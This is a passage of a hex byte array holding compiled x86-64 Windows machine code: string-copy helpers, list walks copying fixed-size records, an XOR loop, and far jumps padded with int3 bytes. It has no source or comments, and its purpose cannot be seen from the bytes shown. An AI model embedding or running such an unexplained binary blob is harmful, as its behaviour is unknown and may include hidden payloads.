0x8D, 0x0D, 0xC6, 0x5D, 0x00, 0x00, 0x49, 0x89, 0x43, 0xE8, 0xE8, 0x11,
0xF8, 0xFF, 0xFF, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0xDF, 0xFA, 0xFF,
0xFF, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0x7D, 0x4F, 0x00, 0x00, 0x89,
0x06, 0x85, 0xC0, 0x0F, 0x84, 0x03, 0x01, 0x00, 0x00, 0x8B, 0xC0, 0x33,
0xC9, 0x48, 0x69, 0xD0, 0x20, 0x04, 0x00, 0x00, 0xFF, 0x15, 0x1E, 0x63,
0x00, 0x00, 0x49, 0x89, 0x06, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE6, 0x00,
0x00, 0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x20, 0x04, 0x00,
0x00, 0x48, 0x8B, 0xC8, 0xE8, 0x9F, 0x5B, 0x00, 0x00, 0x48, 0x8B, 0x5C,
0x24, 0x20, 0x48, 0x8D, 0x44, 0x24, 0x20, 0x33, 0xFF, 0x48, 0x3B, 0xD8,
0x0F, 0x84, 0xBA, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x51,
0x63, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0xA9, 0x00, 0x00, 0x00, 0x48,
0x8B, 0xCB, 0x48, 0x8B, 0xEB, 0xFF, 0x15, 0x3D, 0x63, 0x00, 0x00, 0x84,
0xC0, 0x0F, 0x84, 0x95, 0x00, 0x00, 0x00, 0x3B, 0x3E, 0x73, 0x73, 0x8B,
0xC7, 0x41, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x69, 0xD0, 0x20, 0x04,
0x00, 0x00, 0x48, 0x8D, 0x43, 0x10, 0x49, 0x03, 0x16, 0x0F, 0x10, 0x00,
0x0F, 0x11, 0x02, 0x48, 0x8D, 0x92, 0x80, 0x00, 0x00, 0x00, 0x0F, 0x10,
0x48, 0x10, 0x0F, 0x11, 0x4A, 0x90, 0x0F, 0x10, 0x40, 0x20, 0x0F, 0x11,
0x42, 0xA0, 0x0F, 0x10, 0x48, 0x30, 0x0F, 0x11, 0x4A, 0xB0, 0x0F, 0x10,
0x40, 0x40, 0x0F, 0x11, 0x42, 0xC0, 0x0F, 0x10, 0x48, 0x50, 0x0F, 0x11,
0x4A, 0xD0, 0x0F, 0x10, 0x40, 0x60, 0x0F, 0x11, 0x42, 0xE0, 0x0F, 0x10,
0x48, 0x70, 0x48, 0x83, 0xE8, 0x80, 0x0F, 0x11, 0x4A, 0xF0, 0x49, 0x83,
0xE8, 0x01, 0x75, 0xB1, 0x0F, 0x10, 0x00, 0x0F, 0x11, 0x02, 0x0F, 0x10,
0x48, 0x10, 0x0F, 0x11, 0x4A, 0x10, 0x48, 0x8B, 0x1B, 0x33, 0xD2, 0x48,
0x8B, 0xCD, 0xFF, 0xC7, 0xFF, 0x15, 0x4E, 0x62, 0x00, 0x00, 0x48, 0x8D,
0x4C, 0x24, 0x20, 0x48, 0x3B, 0xD9, 0x0F, 0x85, 0x46, 0xFF, 0xFF, 0xFF,
0xB0, 0x01, 0xEB, 0x02, 0x32, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48,
0x8B, 0x6C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x8B, 0x7C,
0x24, 0x58, 0x48, 0x83, 0xC4, 0x30, 0x41, 0x5E, 0xC3, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
0x83, 0xEC, 0x20, 0x48, 0x8B, 0x59, 0x28, 0x48, 0x8B, 0xF1, 0x48, 0x8D,
0x4A, 0x08, 0x48, 0x8B, 0xFA, 0x33, 0xD2, 0x41, 0xB8, 0x18, 0x04, 0x00,
0x00, 0xE8, 0x82, 0x5A, 0x00, 0x00, 0x48, 0x89, 0x37, 0x4C, 0x8B, 0x46,
0x18, 0x4C, 0x89, 0x47, 0x08, 0x8B, 0x46, 0x20, 0x89, 0x47, 0x10, 0x4D,
0x85, 0xC0, 0x75, 0x15, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x62, 0x00,
0x00, 0x3C, 0x01, 0x75, 0x08, 0x48, 0x8B, 0x43, 0x30, 0x48, 0x89, 0x47,
0x08, 0x83, 0x7F, 0x10, 0x00, 0x75, 0x13, 0x48, 0x8B, 0xCB, 0xFF, 0x15,
0x18, 0x62, 0x00, 0x00, 0x3C, 0x01, 0x75, 0x06, 0x8B, 0x43, 0x40, 0x89,
0x47, 0x10, 0x48, 0x8D, 0x56, 0x40, 0x48, 0x85, 0xD2, 0x74, 0x20, 0x0F,
0xB7, 0x46, 0x38, 0x41, 0xB8, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x44, 0x3B,
0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x12, 0x48, 0x8D,
0x4F, 0x14, 0xE8, 0xD5, 0x56, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15,
0xDC, 0x61, 0x00, 0x00, 0x3C, 0x01, 0x75, 0x2C, 0x48, 0x8D, 0x53, 0x50,
0x48, 0x85, 0xD2, 0x74, 0x23, 0x0F, 0xB7, 0x43, 0x48, 0x41, 0xB8, 0x03,
0x01, 0x00, 0x00, 0x66, 0x44, 0x3B, 0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7,
0xC0, 0x48, 0x8B, 0x12, 0x48, 0x8D, 0x8F, 0x14, 0x01, 0x00, 0x00, 0xE8,
0x9C, 0x56, 0x00, 0x00, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x74,
0x24, 0x38, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x33, 0xDB, 0x4C, 0x8B, 0xD2, 0x4D, 0x8B, 0xD8, 0x44, 0x8B, 0xCB,
0x41, 0xB8, 0x0D, 0x00, 0x00, 0xC0, 0x48, 0x8B, 0xD1, 0x49, 0x8D, 0x42,
0xFF, 0x48, 0x3D, 0xFE, 0xFF, 0xFF, 0x7F, 0x45, 0x0F, 0x47, 0xC8, 0x45,
0x85, 0xC9, 0x78, 0x36, 0x49, 0x8B, 0xCA, 0x48, 0x8B, 0xC2, 0x4D, 0x85,
0xD2, 0x74, 0x0F, 0x66, 0x39, 0x18, 0x74, 0x0A, 0x48, 0x83, 0xC0, 0x02,
0x48, 0x83, 0xE9, 0x01, 0x75, 0xF1, 0x48, 0x8B, 0xC1, 0x48, 0xF7, 0xD8,
0x45, 0x1B, 0xC9, 0x41, 0xF7, 0xD1, 0x45, 0x23, 0xC8, 0x48, 0x85, 0xC9,
0x74, 0x08, 0x4D, 0x8B, 0xC2, 0x4C, 0x2B, 0xC1, 0xEB, 0x03, 0x4C, 0x8B,
0xC3, 0x45, 0x85, 0xC9, 0x78, 0x5C, 0x49, 0x8B, 0xCA, 0x4A, 0x8D, 0x14,
0x42, 0x49, 0x2B, 0xC8, 0x74, 0x32, 0x48, 0x8B, 0xC1, 0x4D, 0x8D, 0x88,
0xFE, 0xFF, 0xFF, 0x7F, 0x49, 0x2B, 0xC2, 0x4C, 0x03, 0xC8, 0x4C, 0x2B,
0xDA, 0x4D, 0x85, 0xC9, 0x74, 0x1A, 0x41, 0x0F, 0xB7, 0x04, 0x13, 0x66,
0x85, 0xC0, 0x74, 0x10, 0x66, 0x89, 0x02, 0x49, 0xFF, 0xC9, 0x48, 0x83,
0xC2, 0x02, 0x48, 0x83, 0xE9, 0x01, 0x75, 0xE1, 0x48, 0x85, 0xC9, 0x48,
0x8D, 0x42, 0xFE, 0x48, 0x0F, 0x45, 0xC2, 0x48, 0xF7, 0xD9, 0x45, 0x1B,
0xC9, 0x41, 0xF7, 0xD1, 0x41, 0x81, 0xE1, 0x05, 0x00, 0x00, 0x80, 0x66,
0x89, 0x18, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x41, 0x8B, 0xC1, 0xC3, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x33, 0xDB, 0x48, 0x8D, 0x42, 0xFF, 0x41,
0xBA, 0xFE, 0xFF, 0xFF, 0x7F, 0x44, 0x8B, 0xCB, 0x49, 0x3B, 0xC2, 0x41,
0xBB, 0x0D, 0x00, 0x00, 0xC0, 0x45, 0x0F, 0x47, 0xCB, 0x45, 0x85, 0xC9,
0x78, 0x4B, 0x48, 0x85, 0xD2, 0x74, 0x26, 0x4C, 0x2B, 0xD2, 0x4C, 0x2B,
0xC1, 0x49, 0x8D, 0x04, 0x12, 0x48, 0x85, 0xC0, 0x74, 0x17, 0x41, 0x0F,
0xB7, 0x04, 0x08, 0x66, 0x85, 0xC0, 0x74, 0x0D, 0x66, 0x89, 0x01, 0x48,
0x83, 0xC1, 0x02, 0x48, 0x83, 0xEA, 0x01, 0x75, 0xE0, 0x48, 0x85, 0xD2,
0x48, 0x8D, 0x41, 0xFE, 0x48, 0x0F, 0x45, 0xC1, 0x48, 0xF7, 0xDA, 0x45,
0x1B, 0xC9, 0x41, 0xF7, 0xD1, 0x41, 0x81, 0xE1, 0x05, 0x00, 0x00, 0x80,
0x66, 0x89, 0x18, 0xEB, 0x08, 0x48, 0x85, 0xD2, 0x74, 0x03, 0x66, 0x89,
0x19, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0x41, 0x8B, 0xC1, 0xC3, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89,
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20,
0x49, 0x8B, 0xF0, 0x8B, 0xDA, 0x44, 0x8B, 0xC2, 0x48, 0x8B, 0xF9, 0x48,
0x8B, 0xD1, 0x4D, 0x8B, 0xF9, 0x48, 0x8B, 0xCE, 0xE8, 0x07, 0x55, 0x00,
0x00, 0x48, 0xC1, 0xEB, 0x03, 0x33, 0xED, 0x48, 0x85, 0xDB, 0x74, 0x57,
0x44, 0x8B, 0xF5, 0x48, 0x2B, 0xFE, 0x49, 0x8B, 0xCF, 0xE8, 0xDE, 0x0D,
0x00, 0x00, 0x49, 0x63, 0xCE, 0xFF, 0xC5, 0x49, 0x03, 0x4F, 0x10, 0x41,
0x83, 0xC6, 0x10, 0x48, 0x33, 0xC1, 0x48, 0x8B, 0x0C, 0x37, 0x48, 0x33,
0xC8, 0xB8, 0xD3, 0x20, 0x0D, 0xD2, 0x48, 0x89, 0x0E, 0x48, 0x8D, 0x76,
0x08, 0x41, 0x8B, 0x4F, 0x08, 0xF7, 0xE9, 0x03, 0xD1, 0xC1, 0xFA, 0x08,
0x8B, 0xC2, 0xC1, 0xE8, 0x1F, 0x03, 0xD0, 0x69, 0xC2, 0x38, 0x01, 0x00,
0x00, 0x2B, 0xC8, 0x48, 0x63, 0xC5, 0x41, 0x89, 0x4F, 0x08, 0x48, 0x3B,
0xC3, 0x72, 0xAF, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x8B, 0x6C, 0x24,
0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5F,
0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C,
0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xEC, 0x50, 0x4C, 0x8B, 0xF1, 0x49, 0x8B, 0xF1, 0x48, 0x8D,
0x0D, 0xB7, 0x59, 0x00, 0x00, 0x4D, 0x8B, 0xF8, 0x8B, 0xEA, 0xE9, 0x19,
0xFF, 0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0x4C, 0x8D, 0x5C, 0x24, 0x50, 0x8B, 0xC3, 0x49,
0x8B, 0x5B, 0x20, 0x49, 0x8B, 0x6B, 0x28, 0x49, 0x8B, 0x73, 0x30, 0x49,
0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x8B,
0xFA, 0x48, 0x8B, 0xD9, 0x48, 0x85, 0xC9, 0x74, 0x56, 0x83, 0xFF, 0x20,
0x72, 0x51, 0x48, 0x8D, 0x0D, 0xCF, 0x58, 0x00, 0x00, 0xE9, 0x6A, 0xFF,
0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x8D, 0x8B, 0x10, 0x27, 0x00, 0x00, 0x81,
0xF9, 0xD0, 0x4E, 0x09, 0x00, 0x77, 0x04, 0x8B, 0xC6, 0xEB, 0x02, 0x33,
0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x74, 0x24, 0x38, 0x48,
0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xF9, 0x8B,
0xEA, 0x48, 0x8D, 0x0D, 0x5C, 0x58, 0x00, 0x00, 0x49, 0x8B, 0xF1, 0x4D,
0x8B, 0xF0, 0xE9, 0x12, 0xFF, 0x12, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5F,
0x41, 0x5E, 0x5F, 0xC3, 0x48, 0x83, 0xEC, 0x28, 0xFF, 0x15, 0xF2, 0x5D,
0x00, 0x00, 0x8B, 0xC0, 0x48, 0xB9, 0x20, 0x03, 0x00, 0x00, 0x80, 0xF7,
0xFF, 0xFF, 0x48, 0x8B, 0x09, 0x48, 0x0F, 0xAF, 0xC8, 0x48, 0xB8, 0x4B,
0x59, 0x86, 0x38, 0xD6, 0xC5, 0x6D, 0x34, 0x48, 0xF7, 0xE9, 0x48, 0xC1,
0xFA, 0x0B, 0x48, 0x8B, 0xC2, 0x48, 0xC1, 0xE8, 0x3F, 0x48, 0x03, 0xC2,
0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28,
0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x38, 0x8B,
0xC9, 0xE8, 0x86, 0x51, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B,
0x4C, 0x24, 0x38, 0xFF, 0x15, 0x7F, 0x5F, 0x00, 0x00, 0x48, 0x8B, 0x44,
0x24, 0x38, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
0x89, 0x78, 0x20, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x30, 0x41, 0x8B, 0xF9,
0x49, 0x8B, 0xF0, 0x4C, 0x8B, 0xF2, 0x8B, 0xD9, 0xE8, 0xA7, 0xFF, 0xFF,
0xFF, 0x48, 0x85, 0xC0, 0x75, 0x19, 0x83, 0xFF, 0x01, 0x0F, 0x85, 0x53,
0x01, 0x00, 0x00, 0x8B, 0xCB, 0xE8, 0xE6, 0x10, 0x00, 0x00, 0x48, 0x85,
0xC0, 0x0F, 0x84, 0x43, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20,
0x48, 0x89, 0x4C, 0x24, 0x28, 0x48, 0x8D, 0x54, 0x24, 0x20, 0x48, 0x8D,
0x4C, 0x24, 0x20, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x48, 0x8B, 0xC8, 0xE8,
0x60, 0x09, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0x1A, 0x01, 0x00, 0x00,
0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0xA6, 0x48, 0x00, 0x00, 0x89, 0x06,
0x85, 0xC0, 0x0F, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8B, 0xC0, 0x33, 0xC9,
0x48, 0x69, 0xD0, 0x18, 0x03, 0x00, 0x00, 0xFF, 0x15, 0x47, 0x5C, 0x00,
0x00, 0x49, 0x89, 0x06, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE9, 0x00, 0x00,
0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x18, 0x03, 0x00, 0x00,
0x48, 0x8B, 0xC8, 0xE8, 0xC8, 0x54, 0x00, 0x00, 0x48, 0x8B, 0x5C, 0x24,
0x20, 0x48, 0x8D, 0x44, 0x24, 0x20, 0x33, 0xFF, 0x48, 0x3B, 0xD8, 0x0F,
0x84, 0xBD, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x7A, 0x5C,
0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0xAC, 0x00, 0x00, 0x00, 0x48, 0x8B,
0xCB, 0x48, 0x8B, 0xEB, 0xFF, 0x15, 0x66, 0x5C, 0x00, 0x00, 0x84, 0xC0,
0x0F, 0x84, 0x98, 0x00, 0x00, 0x00, 0x3B, 0x3E, 0x73, 0x76, 0x8B, 0xC7,
0x41, 0xB8, 0x06, 0x00, 0x00, 0x00, 0x48, 0x69, 0xD0, 0x18, 0x03, 0x00,
0x00, 0x48, 0x8D, 0x43, 0x10, 0x49, 0x03, 0x16, 0x0F, 0x10, 0x00, 0x48,
0x8D, 0x80, 0x80, 0x00, 0x00, 0x00, 0x0F, 0x11, 0x02, 0x48, 0x8D, 0x92,
0x80, 0x00, 0x00, 0x00, 0x0F, 0x10, 0x48, 0x90, 0x0F, 0x11, 0x4A, 0x90,
0x0F, 0x10, 0x40, 0xA0, 0x0F, 0x11, 0x42, 0xA0, 0x0F, 0x10, 0x48, 0xB0,
0x0F, 0x11, 0x4A, 0xB0, 0x0F, 0x10, 0x40, 0xC0, 0x0F, 0x11, 0x42, 0xC0,
0x0F, 0x10, 0x48, 0xD0, 0x0F, 0x11, 0x4A, 0xD0, 0x0F, 0x10, 0x40, 0xE0,
0x0F, 0x11, 0x42, 0xE0, 0x0F, 0x10, 0x48, 0xF0, 0x0F, 0x11, 0x4A, 0xF0,
0x49, 0x83, 0xE8, 0x01, 0x75, 0xAE, 0x0F, 0x10, 0x00, 0x0F, 0x11, 0x02,
0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x42, 0x10, 0x48, 0x8B, 0x1B, 0x33,
0xD2, 0x48, 0x8B, 0xCD, 0xFF, 0xC7, 0xFF, 0x15, 0x74, 0x5B, 0x00, 0x00,
0x48, 0x8D, 0x4C, 0x24, 0x20, 0x48, 0x3B, 0xD9, 0x0F, 0x85, 0x43, 0xFF,
0xFF, 0xFF, 0xB0, 0x01, 0xEB, 0x02, 0x32, 0xC0, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48,
0x8B, 0x7C, 0x24, 0x58, 0x48, 0x83, 0xC4, 0x30, 0x41, 0x5E, 0xC3, 0xCC,
0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48,
0x89, 0x78, 0x18, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x40, 0x48, 0x8B, 0xFA,
0x4C, 0x8B, 0xF1, 0x8B, 0x52, 0x28, 0x48, 0x8D, 0x48, 0xE8, 0xE8, 0xD9,
0x08, 0x00, 0x00, 0x8B, 0x57, 0x30, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8,
0xCC, 0x08, 0x00, 0x00, 0xBA, 0x28, 0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF,
0x15, 0xF3, 0x5A, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x18, 0x03, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x8D, 0x48, 0x10, 0xE8, 0x7F, 0x53, 0x00,
0x00, 0x8B, 0x4F, 0x18, 0xBA, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x3B, 0x54,
0x24, 0x20, 0x48, 0x89, 0x4E, 0x10, 0x8B, 0x4F, 0x20, 0x89, 0x4E, 0x18,
0x0F, 0xB7, 0x4C, 0x24, 0x20, 0x0F, 0x43, 0xD1, 0x48, 0x8D, 0x4E, 0x1C,
0x44, 0x8B, 0xC2, 0x48, 0x8B, 0x54, 0x24, 0x28, 0xE8, 0x0F, 0x50, 0x00,
0x00, 0x0F, 0xB7, 0x44, 0x24, 0x30, 0xB9, 0x03, 0x01, 0x00, 0x00, 0x66,
0x3B, 0x4C, 0x24, 0x30, 0x48, 0x8B, 0x54, 0x24, 0x38, 0x0F, 0x43, 0xC8,
0x44, 0x8B, 0xC1, 0x48, 0x8D, 0x8E, 0x1C, 0x01, 0x00, 0x00, 0xE8, 0xE9,
0x4F, 0x00, 0x00, 0x49, 0x8B, 0x06, 0x4C, 0x39, 0x70, 0x08, 0x74, 0x07,
0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29, 0x48, 0x8B, 0x5C, 0x24, 0x50,
0x48, 0x8B, 0x7C, 0x24, 0x60, 0x48, 0x89, 0x06, 0x4C, 0x89, 0x76, 0x08,
0x48, 0x89, 0x70, 0x08, 0x49, 0x89, 0x36, 0x48, 0x8B, 0x74, 0x24, 0x58,
0x48, 0x83, 0xC4, 0x40, 0x41, 0x5E, 0xC3, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0xF1, 0xBA, 0x28,
0x03, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x2D, 0x5A, 0x00, 0x00, 0x33,
0xD2, 0x41, 0xB8, 0x18, 0x03, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x8D,
0x48, 0x10, 0xE8, 0xB9, 0x52, 0x00, 0x00, 0x4C, 0x8B, 0x45, 0x30, 0x4C,
0x89, 0x47, 0x10, 0x44, 0x8B, 0x45, 0x40, 0x44, 0x89, 0x47, 0x18, 0x41,
0xB8, 0x7F, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0x45, 0x58, 0x66, 0x44, 0x3B,
0xC0, 0x72, 0x04, 0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x55, 0x60, 0x48,
0x8D, 0x4F, 0x1C, 0xE8, 0x48, 0x4F, 0x00, 0x00, 0x0F, 0xB7, 0x45, 0x48,
0x41, 0xB8, 0x03, 0x01, 0x00, 0x00, 0x66, 0x44, 0x3B, 0xC0, 0x72, 0x04,
0x44, 0x0F, 0xB7, 0xC0, 0x48, 0x8B, 0x55, 0x50, 0x48, 0x8D, 0x8F, 0x1C,
0x01, 0x00, 0x00, 0xE8, 0x24, 0x4F, 0x00, 0x00, 0x48, 0x8B, 0x06, 0x48,
0x39, 0x70, 0x08, 0x74, 0x07, 0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29,
0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48, 0x89,
0x77, 0x08, 0x48, 0x89, 0x07, 0x48, 0x89, 0x78, 0x08, 0x48, 0x89, 0x3E,
0x48, 0x8B, 0x74, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC,
0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x56,
0x57, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0xF2, 0x8B, 0xC9,
0x33, 0xED, 0x48, 0x8D, 0x50, 0x20, 0x48, 0x89, 0x68, 0x20, 0x41, 0x8B,
0xD8, 0x41, 0xB6, 0x01, 0xE8, 0xF3, 0x4D, 0x00, 0x00, 0x48, 0x8B, 0x4C,
0x24, 0x58, 0x85, 0xC0, 0x41, 0x0F, 0xB6, 0xFE, 0x0F, 0x48, 0xFD, 0x48,
0x85, 0xC9, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x24, 0x44, 0x8B, 0xC3, 0x48,
0x8B, 0xD6, 0xE8, 0xB5, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x58,
0x8B, 0xD8, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x41, 0x3A, 0xFE, 0x75, 0x06,
0xFF, 0x15, 0xC2, 0x5B, 0x00, 0x00, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24,
0x40, 0x48, 0x8B, 0x6C, 0x24, 0x48, 0x48, 0x83, 0xC4, 0x20, 0x41, 0x5E,
0x5F, 0x5E, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48,
0x89, 0x70, 0x10, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x30,
0x41, 0x8B, 0xF8, 0x48, 0x8B, 0xF2, 0x41, 0xB7, 0x01, 0x45, 0x33, 0xF6,
0x4C, 0x89, 0x70, 0x20, 0x8B, 0xC9, 0x48, 0x8D, 0x50, 0x20, 0xE8, 0x75,
0x4D, 0x00, 0x00, 0x41, 0x0F, 0xB6, 0xDF, 0x85, 0xC0, 0x41, 0x0F, 0x48,
0xDE, 0x88, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x85,
0xC9, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x28, 0x44, 0x8B, 0xC7, 0x48, 0x8B,
0xD6, 0xE8, 0xF2, 0x02, 0x00, 0x00, 0x8B, 0xF8, 0x48, 0x8B, 0x4C, 0x24,
0x68, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x41, 0x3A, 0xDF, 0x75, 0x06, 0xFF,
